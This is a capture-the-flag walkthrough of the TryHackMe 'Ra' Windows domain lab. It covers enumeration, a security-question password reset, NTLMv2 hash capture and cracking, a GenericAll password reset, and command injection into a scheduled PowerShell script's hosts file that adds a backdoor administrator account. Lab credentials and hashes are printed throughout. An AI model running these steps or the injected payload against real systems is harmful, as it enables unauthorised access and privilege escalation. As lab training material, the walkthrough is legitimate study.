RA
URL : https://tryhackme.com/room/ra
Background Story:
You have gained access to the internal network of WindCorp, the multibillion dollar company, running an extensive social media campaign claiming to be unhackable (ha! so much for that claim!).
Next step would be to take their crown jewels and get full access to their internal network. You have spotted a new windows machine that may lead you to your end goal. Can you conquer this end boss and own their internal network?
Happy Hacking!
As always let’s start off by nmap to see what ports are open on the box.
Nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
# Nmap 7.80 scan initiated Mon Oct 4 10:05:30 2021 as: /usr/bin/nmap -p- --max-retries 1 --max-rate 500 --max-scan-delay 20 -T4 -v --open -oN nmap/Full_10.10.228.182.nmap --system-dns --stats-every 3s 10.10.228.182
Warning: 10.10.228.182 giving up on port because retransmission cap hit (1).
Nmap scan report for fire.windcorp.thm (10.10.228.182)
Host is up (0.17s latency).
Not shown: 65499 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
2179/tcp open vmrdp
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5222/tcp open xmpp-client
5223/tcp open hpvirtgrp
5229/tcp open jaxflow
5262/tcp open unknown
5263/tcp open unknown
5269/tcp open xmpp-server
5270/tcp open xmp
5275/tcp open unknown
5276/tcp open unknown
5985/tcp open wsman
7070/tcp open realserver
7443/tcp open oracleas-https
7777/tcp open cbt
9090/tcp open zeus-admin
9091/tcp open xmltec-xmlmail
9389/tcp open adws
49670/tcp open unknown
49674/tcp open unknown
49675/tcp open unknown
49676/tcp open unknown
49748/tcp open unknown
49938/tcp open unknown
Read data files from: /usr/bin/../share/nmap
# Nmap done at Mon Oct 4 10:10:30 2021 -- 1 IP address (1 host up) scanned in 299.27 seconds
Recon
Port 389
namingContexts from ldapsearch
Domain : windcorp.thm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
kali ~/ctf/tryhackme/Ra ldapsearch -h 10.10.228.182 -x -s base namingContexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingContexts
#
#
dn:
namingContexts: DC=windcorp,DC=thm
namingContexts: CN=Configuration,DC=windcorp,DC=thm
namingContexts: CN=Schema,CN=Configuration,DC=windcorp,DC=thm
namingContexts: DC=ForestDnsZones,DC=windcorp,DC=thm
namingContexts: DC=DomainDnsZones,DC=windcorp,DC=thm
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
Port 445
1
2
3
kali ~/ctf/tryhackme/Ra 2 crackmapexec smb windcorp.thm -u "" -p ""
SMB 10.10.228.182 445 FIRE [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB 10.10.228.182 445 FIRE [-] windcorp.thm\: STATUS_ACCESS_DENIED
Port 80
![[Pasted image 20211004110600.png]](/assets/images/Pasted image 20211004110600.png)
![[Pasted image 20211004100112.png]](/assets/images/Pasted image 20211004100112.png)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=organicfish718@fire.windcorp.thm"> <a href="xmpp:organicfish718@fire.windcorp.thm">Antonietta Vidal</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=organicwolf509@fire.windcorp.thm"> <a href="xmpp:organicwolf509@fire.windcorp.thm">Britney Palmer</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=tinywolf424@fire.windcorp.thm"> <a href="xmpp:tinywolf424@fire.windcorp.thm">Brittany Cruz</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=angrybird253@fire.windcorp.thm"> <a href="xmpp:angrybird253@fire.windcorp.thm">Carla Meyer</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=buse@fire.windcorp.thm"> <a href="xmpp:buse@fire.windcorp.thm">Buse Candan</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=Edeltraut@fire.windcorp.thm"><a href="xmpp:Edeltraut@fire.windcorp.thm"> Edeltraut Daub</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=Edward@fire.windcorp.thm"><a href="xmpp:Edward@fire.windcorp.thm"> Edward Lewis</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=Emile@fire.windcorp.thm"><a href="xmpp:Emile@fire.windcorp.thm"> Emile Lavoie</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=tinygoose102@fire.windcorp.thm"><a href="xmpp:tinygoose102@fire.windcorp.thm"> Emile Henry</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=brownostrich284@fire.windcorp.thm"><a href="xmpp:brownostrich284@fire.windcorp.thm"> Emily Anderson</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=sadswan869@fire.windcorp.thm"><a href="xmpp:sadswan869@fire.windcorp.thm"> Hemmo Boschma</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=goldencat416@fire.windcorp.thm"><a href="xmpp:sadswan869@fire.windcorp.thm"> Isabella Hughes</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=whiteleopard529@fire.windcorp.thm"><a href="xmpp:whiteleopard529@fire.windcorp.thm"> Isra Saur</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=happymeercat399@fire.windcorp.thm"><a href="xmpp:happymeercat399@fire.windcorp.thm"> Jackson Vasquez</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=orangegorilla428@fire.windcorp.thm"><a href="xmpp:orangegorilla428@fire.windcorp.thm"> Jaqueline Dittmer</a></li>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
cat emails-web.txt | awk -F "jid=" '{print $2}' | awk -F "\">" '{ print $1 }' | tee emails.txt
organicfish718@fire.windcorp.thm
organicwolf509@fire.windcorp.thm
tinywolf424@fire.windcorp.thm
angrybird253@fire.windcorp.thm
buse@fire.windcorp.thm
Edeltraut@fire.windcorp.thm
Edward@fire.windcorp.thm
Emile@fire.windcorp.thm
tinygoose102@fire.windcorp.thm
brownostrich284@fire.windcorp.thm
sadswan869@fire.windcorp.thm
goldencat416@fire.windcorp.thm
whiteleopard529@fire.windcorp.thm
happymeercat399@fire.windcorp.thm
orangegorilla428@fire.windcorp.thm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
cat emails-web.txt | awk -F "jid=" '{print $2}' | awk -F "\">" '{ print $1 }' | awk -F '@' '{ print $1}' | tee users.txt
organicfish718
organicwolf509
tinywolf424
angrybird253
buse
Edeltraut
Edward
Emile
tinygoose102
brownostrich284
sadswan869
goldencat416
whiteleopard529
happymeercat399
orangegorilla428
![[Pasted image 20211004112003.png]](/assets/images/Pasted image 20211004112003.png)
On the main webpage we have some employees in focus with a puppy.
![[Pasted image 20211004111746.png]](/assets/images/Pasted image 20211004111746.png)
Image name of the employee is named with the pet name Sparky
![[Pasted image 20211004111941.png]](/assets/images/Pasted image 20211004111941.png)
Adding lilyle to our users.txt file and performing userenum on AD to see if the users exists on Active Directory.
Port 88
Kerberute
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
kali ~/ctf/tryhackme/Ra /opt/tools/kerbrute userenum -d windcorp.thm --dc windcorp.thm users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 10/04/21 - Ronnie Flathers @ropnop
2021/10/04 11:21:02 > Using KDC(s):
2021/10/04 11:21:02 > windcorp.thm:88
2021/10/04 11:21:03 > [+] VALID USERNAME: angrybird253@windcorp.thm
2021/10/04 11:21:03 > [+] VALID USERNAME: buse@windcorp.thm
2021/10/04 11:21:03 > [+] VALID USERNAME: Emile@windcorp.thm
2021/10/04 11:21:03 > [+] VALID USERNAME: tinygoose102@windcorp.thm
2021/10/04 11:21:03 > [+] VALID USERNAME: Edward@windcorp.thm
2021/10/04 11:21:03 > [+] VALID USERNAME: brownostrich284@windcorp.thm
2021/10/04 11:21:03 > [+] VALID USERNAME: organicfish718@windcorp.thm
2021/10/04 11:21:03 > [+] VALID USERNAME: Edeltraut@windcorp.thm
2021/10/04 11:21:03 > [+] VALID USERNAME: whiteleopard529@windcorp.thm
2021/10/04 11:21:03 > [+] VALID USERNAME: goldencat416@windcorp.thm
2021/10/04 11:21:03 > [+] VALID USERNAME: sadswan869@windcorp.thm
2021/10/04 11:21:03 > [+] VALID USERNAME: orangegorilla428@windcorp.thm
2021/10/04 11:21:03 > [+] VALID USERNAME: happymeercat399@windcorp.thm
2021/10/04 11:21:03 > [+] VALID USERNAME: lilyle@windcorp.thm
2021/10/04 10:35:20 > Done! Tested 15 usernames (13 valid) in 0.354 seconds
User lilyle exists in the active directory domain.
Resetting the password of user lilyle using security question of pet name.
![[Pasted image 20211004112254.png]](/assets/images/Pasted image 20211004112254.png)
![[Pasted image 20211004112306.png]](/assets/images/Pasted image 20211004112306.png)
user: lilyle pass: ChangeMe#1234
GetNPUsers.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
kali ~/ctf/tryhackme/Ra GetNPUsers.py -outputfile out.txt -usersfile users.txt -no-pass -dc-ip windcorp.thm windcorp.thm/
/usr/local/lib/python2.7/dist-packages/OpenSSL/crypto.py:14: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
from cryptography import utils, x509
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[-] User organicfish718 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User angrybird253 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User buse doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Edeltraut doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Edward doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Emile doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User tinygoose102 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User brownostrich284 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sadswan869 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User goldencat416 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User whiteleopard529 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User happymeercat399 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User orangegorilla428 doesn't have UF_DONT_REQUIRE_PREAUTH set
None of the users have pre-auth set enabled
Checking the credentials with SMB.
![[Pasted image 20211004112834.png]](/assets/images/Pasted image 20211004112834.png)
![[Pasted image 20211004113027.png]](/assets/images/Pasted image 20211004113027.png)
Flag 1: THM{466d52dc75a277d6…..}
LdapDomainDump
1
2
3
4
5
6
kali ~/ctf/tryhackme/Ra 1 ldapdomaindump -u 'windcorp.thm\lilyle' -p 'ChangeMe#1234' -o ldap windcorp.thm
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
![[Pasted image 20211004132912.png]](/assets/images/Pasted image 20211004132912.png)
Tag: Ldapdomainusers
![[Pasted image 20211004133044.png]](/assets/images/Pasted image 20211004133044.png)
IT Group
SMB Users
![[Pasted image 20211004132633.png]](/assets/images/Pasted image 20211004132633.png)
More users
1
2
3
4
5
6
7
8
kali ~/ctf/tryhackme/Ra/spark sudo dpkg -i spark_2_8_3.deb
[sudo] password for kali:
Selecting previously unselected package spark-messenger.
(Reading database ... 528511 files and directories currently installed.)
Preparing to unpack spark_2_8_3.deb ...
Unpacking spark-messenger (2.8.3) ...
Setting up spark-messenger (2.8.3) ...
Processing triggers for kali-menu (2020.3.2) ...
User
![[Pasted image 20211004134234.png]](/assets/images/Pasted image 20211004134234.png)
![[Pasted image 20211004134504.png]](/assets/images/Pasted image 20211004134504.png)
https://github.com/theart42/cves/blob/master/cve-2020-12772/CVE-2020-12772.md
![[Pasted image 20211004135258.png]](/assets/images/Pasted image 20211004135258.png)
![[Pasted image 20211004135324.png]](/assets/images/Pasted image 20211004135324.png)
1
2
3
[HTTP] NTLMv2 Client : 10.10.228.182
[HTTP] NTLMv2 Username : WINDCORP\buse
[HTTP] NTLMv2 Hash : buse::WINDCORP:0b8a2d804296d785:3D175E1842BC653F616A43C550486723:0101000000000000916F9306F9B8D701D56215B0B29B4DED000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C0008003000300000000000000001000000002000006D54EB32A1E678F03F198B0720747D714769132058AF95F68E1890E4B7AC541E0A00100000000000000000000000000000000000090000000000000000000000
Now let’s crack the hash using hashcat NTLMv2 mode.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
kali ~/ctf/tryhackme/Ra hashcat -a 0 -m 5600 hash.txt /opt/rockyou.txt
hashcat (v6.0.0) starting...
OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Xeon(R) CPU E5-2660 v4 @ 2.00GHz, 5852/5916 MB (2048 MB allocatable), 8MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 66 MB
Dictionary cache hit:
* Filename..: /opt/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
BUSE::WINDCORP:0b8a2d804296d785:3d175e1842bc653f616a43c550486723:0101000000000000916f9306f9b8d701d56215b0b29b4ded000000000200060053004d0042000100160053004d0042002d0054004f004f004c004b00490054000400120073006d0062002e006c006f00630061006c000300280073006500720076006500720032003000300033002e0073006d0062002e006c006f00630061006c000500120073006d0062002e006c006f00630061006c0008003000300000000000000001000000002000006d54eb32a1e678f03f198b0720747d714769132058af95f68e1890e4b7ac541e0a00100000000000000000000000000000000000090000000000000000000000:uzunLM+3131
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: BUSE::WINDCORP:0b8a2d804296d785:3d175e1842bc653f616...000000
Time.Started.....: Mon Oct 4 13:55:38 2021 (3 secs)
Time.Estimated...: Mon Oct 4 13:55:41 2021 (0 secs)
Guess.Base.......: File (/opt/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 991.9 kH/s (3.08ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 2965504/14344384 (20.67%)
Rejected.........: 0/2965504 (0.00%)
Restore.Point....: 2957312/14344384 (20.62%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: v1001371 -> usher272
Started: Mon Oct 4 13:55:19 2021
Stopped: Mon Oct 4 13:55:44 2021
1
2
User: buse
Password: uzunLM+3131
![[Pasted image 20211004135755.png]](/assets/images/Pasted image 20211004135755.png)
Flag 2: THM{6f690fc72b9ae8dc25a24a1……xxx}
SharpHound - BloodHound
Uploaded sharpHound.ps1 to the server.
![[Pasted image 20211004141412.png]](/assets/images/Pasted image 20211004141412.png)
1
invoke-bloodhound -collectionmethod all -domain windcorp.thm -LDAPUser buse -LDAPPass uzunLM+3131
![[Pasted image 20211004142127.png]](/assets/images/Pasted image 20211004142127.png)
![[Pasted image 20211004144716.png]](/assets/images/Pasted image 20211004144716.png)
Root
Searching through the directories I found scripts folder with a powershell script.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
*Evil-WinRM* PS C:\Users\buse\Documents> cd ../
cd *Evil-WinRM* PS C:\Users\buse> cd ../..
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/2/2020 6:33 AM inetpub
d----- 9/15/2018 12:19 AM PerfLogs
d-r--- 5/8/2020 7:43 AM Program Files
d----- 5/7/2020 2:51 AM Program Files (x86)
d----- 5/3/2020 5:48 AM scripts
d----- 5/29/2020 5:45 PM Shared
d-r--- 5/2/2020 3:05 PM Users
d----- 5/30/2020 7:00 AM Windows
*Evil-WinRM* PS C:\> cd scripts
d*Evil-WinRM* PS C:\scripts> dir
Directory: C:\scripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/3/2020 5:53 AM 4119 checkservers.ps1
-a---- 10/4/2021 2:23 AM 31 log.txt
*Evil-WinRM* PS C:\scripts> type log.txt
Last run: 10/04/2021 02:23:27
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
*Evil-WinRM* PS C:\scripts> type checkservers.ps1
# reset the lists of hosts prior to looping
$OutageHosts = $Null
# specify the time you want email notifications resent for hosts that are down
$EmailTimeOut = 30
# specify the time you want to cycle through your host lists.
$SleepTimeOut = 45
# specify the maximum hosts that can be down before the script is aborted
$MaxOutageCount = 10
# specify who gets notified
$notificationto = "brittanycr@windcorp.thm"
# specify where the notifications come from
$notificationfrom = "admin@windcorp.thm"
# specify the SMTP server
$smtpserver = "relay.windcorp.thm"
# start looping here
Do{
$available = $Null
$notavailable = $Null
Write-Host (Get-Date)
# Read the File with the Hosts every cycle, this way to can add/remove hosts
# from the list without touching the script/scheduled task,
# also hash/comment (#) out any hosts that are going for maintenance or are down.
get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match "#")} |
ForEach-Object {
$p = "Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue"
Invoke-Expression $p
if($p)
{
# if the Host is available then just write it to the screen
write-host "Available host ---> "$_ -BackgroundColor Green -ForegroundColor White
[Array]$available += $_
}
else
{
# If the host is unavailable, give a warning to screen
write-host "Unavailable host ------------> "$_ -BackgroundColor Magenta -ForegroundColor White
$p = Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue
if(!($p))
{
# If the host is still unavailable for 4 full pings, write error and send email
write-host "Unavailable host ------------> "$_ -BackgroundColor Red -ForegroundColor White
[Array]$notavailable += $_
if ($OutageHosts -ne $Null)
{
if (!$OutageHosts.ContainsKey($_))
{
# First time down add to the list and send email
Write-Host "$_ Is not in the OutageHosts list, first time down"
$OutageHosts.Add($_,(get-date))
$Now = Get-date
$Body = "$_ has not responded for 5 pings at $Now"
Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom `
-Subject "Host $_ is down" -SmtpServer $smtpserver
}
else
{
# If the host is in the list do nothing for 1 hour and then remove from the list.
Write-Host "$_ Is in the OutageHosts list"
if (((Get-Date) - $OutageHosts.Item($_)).TotalMinutes -gt $EmailTimeOut)
{$OutageHosts.Remove($_)}
}
}
else
{
# First time down create the list and send email
Write-Host "Adding $_ to OutageHosts."
$OutageHosts = @{$_=(get-date)}
$Body = "$_ has not responded for 5 pings at $Now"
Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom `
-Subject "Host $_ is down" -SmtpServer $smtpserver
}
}
}
}
# Report to screen the details
$log = "Last run: $(Get-Date)"
write-host $log
Set-Content -Path C:\scripts\log.txt -Value $log
Write-Host "Available count:"$available.count
Write-Host "Not available count:"$notavailable.count
Write-Host "Not available hosts:"
$OutageHosts
Write-Host ""
Write-Host "Sleeping $SleepTimeOut seconds"
sleep $SleepTimeOut
if ($OutageHosts.Count -gt $MaxOutageCount)
{
# If there are more than a certain number of host down in an hour abort the script.
$Exit = $True
$body = $OutageHosts | Out-String
Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom `
-Subject "More than $MaxOutageCount Hosts down, monitoring aborted" -SmtpServer $smtpServer
}
}
while ($Exit -ne $True)
Going through the source code, checkservers.ps1 tests connection for everyhost in C:\Users\brittanycr\hosts.txt.
![[Pasted image 20211004150330.png]](/assets/images/Pasted image 20211004150330.png)
But unfortunately we don’t have permission to write to hosts.txt file. Let’s go back to bloodhound and set start node as buse and end node as brittanycr and see what relationships we have on the user.
![[Pasted image 20211004150524.png]](/assets/images/Pasted image 20211004150524.png)
We have GenericAll permissions on the brittanycr user. Let’s try resetting the password for the user.
1
2
*Evil-WinRM* PS C:\Users\buse\downloads> net user brittanycr NewPassword123 /domain
The command completed successfully.
![[Pasted image 20211004155203.png]](/assets/images/Pasted image 20211004155203.png)
Evil-winrm could not connect with the credentials change. Let;s try to connect to smb
![[Pasted image 20211004155334.png]](/assets/images/Pasted image 20211004155334.png)
1
2
3
4
5
6
7
8
9
10
smb: \> cd brittanycr
smb: \brittanycr\> dir
. D 0 Sun May 3 05:06:46 2020
.. D 0 Sun May 3 05:06:46 2020
hosts.txt A 22 Sun May 3 19:14:57 2020
15587583 blocks of size 4096. 10912692 blocks available
smb: \brittanycr\> get hosts.txt
getting file \brittanycr\hosts.txt of size 22 as hosts.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \brittanycr\>
1
2
3
16:03:23.479338 IP 10.10.111.236 > 10.9.48.164: ICMP echo request, id 1, seq 67, length 40
16:03:23.479405 IP 10.9.48.164 > 10.10.111.236: ICMP echo reply, id 1, seq 67, length 40
We get a icmp packet from the server to our machine.
Now we need to add our payload in the hosts file with breaking the query with ;
1
;net user tinyboy hello!123 /add;net localgroup Administrators tinyboy /add
upload the updated hosts file.
1
2
3
kali ~/ctf/tryhackme/Ra crackmapexec smb windcorp.thm -u tinyboy -p 'hello!123'
SMB 10.10.111.236 445 FIRE [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB 10.10.111.236 445 FIRE [+] windcorp.thm\tinyboy:hello!123 (Pwn3d!)
We have successfully added ourself as user.
![[Pasted image 20211004170206.png]](/assets/images/Pasted image 20211004170206.png)
We are in administrator group.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
cd *Evil-WinRM* PS C:\Users> cd Administrator/
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/7/2020 1:22 AM 47 Flag3.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type Flag3.txt
THM{ba3a2bff2e535b514ad760c283890faae54ac2ef}
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
Flag 3: THM{ba3a2bff2e535b514a…….xxxxx}